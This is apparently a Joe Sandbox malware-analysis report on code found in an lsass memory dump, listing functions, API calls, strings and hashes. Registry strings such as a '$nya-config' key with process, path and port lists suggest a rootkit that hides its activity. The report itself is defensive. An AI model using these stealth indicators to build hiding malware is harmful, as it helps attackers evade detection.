Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE861957
Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861977
Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE861992
Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE86199C

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: a93f48e7d1e197921b2c89fcc1377b430e77d193c78992cad38dce1289e891a4
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: B831E675280B5181EB52AB27D9513ED63A5AB8CBE0F2458219F0E877B7DF34CC50C296

Non-executed Functions

Function 00000140AE862FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000140AE863094
lstrlenW.KERNEL32 ref: 00000140AE8632BE

Part of subcall function 00000140AE861A30: OpenProcess.KERNEL32 ref: 00000140AE861A56
Part of subcall function 00000140AE861A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000140AE861A74
Part of subcall function 00000140AE861A30: PathFindFileNameW.SHLWAPI ref: 00000140AE861A83
Part of subcall function 00000140AE861A30: lstrlenW.KERNEL32 ref: 00000140AE861A8F
Part of subcall function 00000140AE861A30: StrCpyW.SHLWAPI ref: 00000140AE861AA2
Part of subcall function 00000140AE861A30: CloseHandle.KERNEL32 ref: 00000140AE861AB0

GetProcAddress.KERNEL32 ref: 00000140AE8630A9

Part of subcall function 00000140AE863F88: StrCmpNIW.SHLWAPI(?,?,?,00000140AE86272F), ref: 00000140AE863FA0

StrCmpNIW.SHLWAPI ref: 00000140AE8630EC
lstrlenW.KERNEL32 ref: 00000140AE863214

Strings

ntdll.dll, xrefs: 00000140AE86308D
NtQueryObject, xrefs: 00000140AE86309F
\Device\Nsi, xrefs: 00000140AE8630DF

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 30105a61bc151a0cf1162bf0fe0c77605415bb98e870bb877dae239f2002ea45
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: E5B16A3225079086EB669F27D5007E9A3A5FB88BA4F645016EF0D57BB4DF35CD80C382

Function 00000140AE8684B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000140AE8684CC
RtlCaptureContext.NTDLL ref: 00000140AE8684F9
RtlLookupFunctionEntry.NTDLL ref: 00000140AE868513
RtlVirtualUnwind.NTDLL ref: 00000140AE868554
IsDebuggerPresent.KERNEL32 ref: 00000140AE8685A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000140AE8685C5
UnhandledExceptionFilter.KERNEL32 ref: 00000140AE8685D0

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 30f55be31c68febc232c55efff6d7e1e80c135477459ee66c31d45664086d95c
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 10317072255B808AEB61DF61E8403ED7364F788758F64402ADF4E47BA9DF38C948C711

Function 00000140AE86CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000140AE86CE0B
RtlLookupFunctionEntry.NTDLL ref: 00000140AE86CE23
RtlVirtualUnwind.NTDLL ref: 00000140AE86CE5E
IsDebuggerPresent.KERNEL32 ref: 00000140AE86CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 00000140AE86CEA1
UnhandledExceptionFilter.KERNEL32 ref: 00000140AE86CEAC

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 78ba84541a86c6d43e78bd0af016faa51c5a0e34a5652c69362c780adff1c5ac
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 4B415B36254F8086EB61DB26E8403EE73A4F788768F600115EF9D47BA8DF38C955CB41

Function 00000140AE86DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00000140AE86DB99
FindNextFileW.KERNEL32 ref: 00000140AE86DCCF
FindClose.KERNEL32 ref: 00000140AE86DD0F
FindClose.KERNEL32 ref: 00000140AE86DD3B

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 6a24d750cc30c13e93ee8cb67e7a54552aac04a3848ba964ee03a28b82ffad1c
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: BFA1D33274478049FB22AB77A4407ED6BA1A789BB4F244115DF9C27BFDDA38C841C782

Function 00000140AE861724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE86172F
HeapAlloc.KERNEL32 ref: 00000140AE86173E

Part of subcall function 00000140AE861264: GetProcessHeap.KERNEL32 ref: 00000140AE86126A
Part of subcall function 00000140AE861264: HeapAlloc.KERNEL32 ref: 00000140AE861279
Part of subcall function 00000140AE861264: GetProcessHeap.KERNEL32 ref: 00000140AE861293
Part of subcall function 00000140AE861264: HeapAlloc.KERNEL32 ref: 00000140AE8612A4

Part of subcall function 00000140AE861000: GetProcessHeap.KERNEL32 ref: 00000140AE861006
Part of subcall function 00000140AE861000: HeapAlloc.KERNEL32 ref: 00000140AE861015
Part of subcall function 00000140AE861000: GetProcessHeap.KERNEL32 ref: 00000140AE861028
Part of subcall function 00000140AE861000: HeapAlloc.KERNEL32 ref: 00000140AE861037

RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617AE
RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617DB
RegCloseKey.ADVAPI32 ref: 00000140AE8617F5
RegOpenKeyExW.ADVAPI32 ref: 00000140AE861815
RegCloseKey.ADVAPI32 ref: 00000140AE861830
RegOpenKeyExW.ADVAPI32 ref: 00000140AE861850
RegCloseKey.ADVAPI32 ref: 00000140AE86186B
RegOpenKeyExW.ADVAPI32 ref: 00000140AE86188B
RegCloseKey.ADVAPI32 ref: 00000140AE8618A6
RegOpenKeyExW.ADVAPI32 ref: 00000140AE8618C6
RegCloseKey.ADVAPI32 ref: 00000140AE8618E1
RegOpenKeyExW.ADVAPI32 ref: 00000140AE861901
RegCloseKey.ADVAPI32 ref: 00000140AE86191C
RegOpenKeyExW.ADVAPI32 ref: 00000140AE86193C
RegCloseKey.ADVAPI32 ref: 00000140AE861957
RegOpenKeyExW.ADVAPI32 ref: 00000140AE861977
RegCloseKey.ADVAPI32 ref: 00000140AE861992
RegCloseKey.ADVAPI32 ref: 00000140AE86199C

Part of subcall function 00000140AE8612B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000140AE861315
Part of subcall function 00000140AE8612B8: GetProcessHeap.KERNEL32 ref: 00000140AE861323
Part of subcall function 00000140AE8612B8: HeapAlloc.KERNEL32 ref: 00000140AE861334
Part of subcall function 00000140AE8612B8: RegEnumValueW.ADVAPI32 ref: 00000140AE861393
Part of subcall function 00000140AE8612B8: GetProcessHeap.KERNEL32 ref: 00000140AE8613DB
Part of subcall function 00000140AE8612B8: HeapAlloc.KERNEL32 ref: 00000140AE8613E9
Part of subcall function 00000140AE8612B8: GetProcessHeap.KERNEL32 ref: 00000140AE861406
Part of subcall function 00000140AE8612B8: HeapFree.KERNEL32 ref: 00000140AE861414
Part of subcall function 00000140AE8612B8: lstrlenW.KERNEL32 ref: 00000140AE86141D
Part of subcall function 00000140AE8612B8: GetProcessHeap.KERNEL32 ref: 00000140AE86142B
Part of subcall function 00000140AE8612B8: HeapAlloc.KERNEL32 ref: 00000140AE861439

Strings

service_names, xrefs: 00000140AE8618BF
udp, xrefs: 00000140AE861970
paths, xrefs: 00000140AE861884
startup, xrefs: 00000140AE8617D1
tcp_local, xrefs: 00000140AE8618FA
process_names, xrefs: 00000140AE861849
pid, xrefs: 00000140AE86180E
tcp_remote, xrefs: 00000140AE861935
SOFTWARE\$nya-config, xrefs: 00000140AE86178E

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: a5e638187db61ddf807089c7b241eab6c5c83a185a32c0152d227a07cfa3afc6
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: E771D736750B5186EB22AF66E8906D933A4FB8CBA8F601111EF4D57B79DF38C844C781

Function 00000140AE8612B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000140AE861315
GetProcessHeap.KERNEL32 ref: 00000140AE861323
HeapAlloc.KERNEL32 ref: 00000140AE861334
RegEnumValueW.ADVAPI32 ref: 00000140AE861393

Part of subcall function 00000140AE861530: StrCmpIW.SHLWAPI ref: 00000140AE861561

GetProcessHeap.KERNEL32 ref: 00000140AE8613DB
HeapAlloc.KERNEL32 ref: 00000140AE8613E9
GetProcessHeap.KERNEL32 ref: 00000140AE861406
HeapFree.KERNEL32 ref: 00000140AE861414
lstrlenW.KERNEL32 ref: 00000140AE86141D
GetProcessHeap.KERNEL32 ref: 00000140AE86142B
HeapAlloc.KERNEL32 ref: 00000140AE861439
StrCpyW.SHLWAPI ref: 00000140AE86145B
GetProcessHeap.KERNEL32 ref: 00000140AE861472
HeapFree.KERNEL32 ref: 00000140AE861480

Strings

d, xrefs: 00000140AE861356

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: f6094fa10016ead736d6be57b1c461f648ea31a726f70ec7dbbb6fdacba43793
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: A9515D32250B8496E725DF62E54839AB7A2F788FA9F644124DF4D07728DF3CC449C781

Function 00000140AE86EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,00000140AE86F34A,?,?,00000000,00000140AE86F2CD), ref: 00000140AE86EFF5
GetLastError.KERNEL32(?,?,00000000,00000140AE86F2CD), ref: 00000140AE86F007
LoadLibraryExW.KERNEL32(?,?,00000000,00000140AE86F2CD), ref: 00000140AE86F049
VirtualProtect.KERNEL32 ref: 00000140AE86F0A5
VirtualProtect.KERNEL32 ref: 00000140AE86F0D6
FreeLibrary.KERNEL32(?,?,00000000,00000140AE86F2CD), ref: 00000140AE86F11A
GetProcAddress.KERNEL32(?,?,00000000,00000140AE86F2CD), ref: 00000140AE86F126

Strings

ext-ms-, xrefs: 00000140AE86F02E
AppPolicyGetProcessTerminationMethod, xrefs: 00000140AE86F157, 00000140AE86F165
api-ms-, xrefs: 00000140AE86F01B

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 7749dad9bab9c0c178065b4a53cf799951ec2e8d7f54f84ac44c295c086c618d
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 31514931781B4451EA179B57A8507E932A0BB4DBB0FB80B259F3D473E0EF38D845C682

Function 00000140AE8633A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 00000140AE8633FD
GetProcessHeap.KERNEL32 ref: 00000140AE863412
HeapAlloc.KERNEL32 ref: 00000140AE863420
PdhGetCounterInfoW.PDH ref: 00000140AE863436
StrCmpW.SHLWAPI ref: 00000140AE86344B

Part of subcall function 00000140AE863950: StrCmpNW.SHLWAPI ref: 00000140AE863972
Part of subcall function 00000140AE863950: StrStrW.SHLWAPI ref: 00000140AE863990
Part of subcall function 00000140AE863950: StrToIntW.SHLWAPI ref: 00000140AE8639B7

GetProcessHeap.KERNEL32 ref: 00000140AE863488
HeapFree.KERNEL32 ref: 00000140AE863496

Strings

\GPU Engine(*)\Running Time, xrefs: 00000140AE863444

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 263b5d98dfd789f97b615d5b37c350a8b9572b51cf3b79b6f5569e1132c5a4cb
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 6531CE32A40B8096E722DF13A944399B3A0FB9CBE5F6401249F4D43A34DF38D856C381

Function 00000140AE8634B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 00000140AE863516
GetProcessHeap.KERNEL32 ref: 00000140AE863527
HeapAlloc.KERNEL32 ref: 00000140AE863535
PdhGetCounterInfoW.PDH ref: 00000140AE86354B
StrCmpW.SHLWAPI ref: 00000140AE863560

Part of subcall function 00000140AE863950: StrCmpNW.SHLWAPI ref: 00000140AE863972
Part of subcall function 00000140AE863950: StrStrW.SHLWAPI ref: 00000140AE863990
Part of subcall function 00000140AE863950: StrToIntW.SHLWAPI ref: 00000140AE8639B7

GetProcessHeap.KERNEL32 ref: 00000140AE86358D
HeapFree.KERNEL32 ref: 00000140AE86359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 00000140AE863559

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 4f6d85a2fb98f14b4997691a7945017fb243bf8ecf7ad2143475a864ba089b29
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: F0313E31650B818AE752DF63A88879973A1BB8CFA9F6441259F4E43734EF38D845C781

Function 00000140AE86A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000140AE86A289

Part of subcall function 00000140AE86B144: __GetUnwindTryBlock.LIBCMT ref: 00000140AE86B187
Part of subcall function 00000140AE86B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000140AE86B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000140AE86A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000140AE86A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000140AE86A6BC

Strings

csm, xrefs: 00000140AE86A2A3
csm, xrefs: 00000140AE86A384
csm, xrefs: 00000140AE86A30A

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 65fdb15c267c9e13b84f25c510c081320872cd80976ed899fd202103a309cf4a
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 1CD19B32644B808AEB22DF66D4453DD77A0F7497A8F201155EF8D57BBADB38C880D782

Function 00000140ADFC962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000140ADFC9689

Part of subcall function 00000140ADFCA544: __GetUnwindTryBlock.LIBCMT ref: 00000140ADFCA587
Part of subcall function 00000140ADFCA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000140ADFCA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000140ADFC9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000140ADFC99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000140ADFC9ABC

Strings

csm, xrefs: 00000140ADFC970A
csm, xrefs: 00000140ADFC9784
csm, xrefs: 00000140ADFC96A3

Memory Dump Source

Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: f5437a1e7da2a725e9ab22ad33e8f30e08157a3268999d223fd606fd9b310203
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: E9D17F7262078887EB62DF66D4803DE37B2FB49789F205115EF8957BA6DB34C1A2D700

Function 00000140AE86104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000140AE8610B1
RegEnumValueW.ADVAPI32 ref: 00000140AE861117
GetProcessHeap.KERNEL32 ref: 00000140AE86115A
HeapAlloc.KERNEL32 ref: 00000140AE861168
GetProcessHeap.KERNEL32 ref: 00000140AE861185
HeapFree.KERNEL32 ref: 00000140AE861193

Strings

d, xrefs: 00000140AE8610D6

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: b3e6ac650a1da149a06b88ef6f31a51e5fea5f7ee42c972b554680c0ac2eddc6
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 9B415E32214B84DAE761CF22E44439A77B1F388BA8F648115DF8D07B68DF38C845CB41

Function 00000140AE862518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000140AE86252D
GetCurrentProcessId.KERNEL32 ref: 00000140AE862537
CreateFileW.KERNEL32 ref: 00000140AE862568
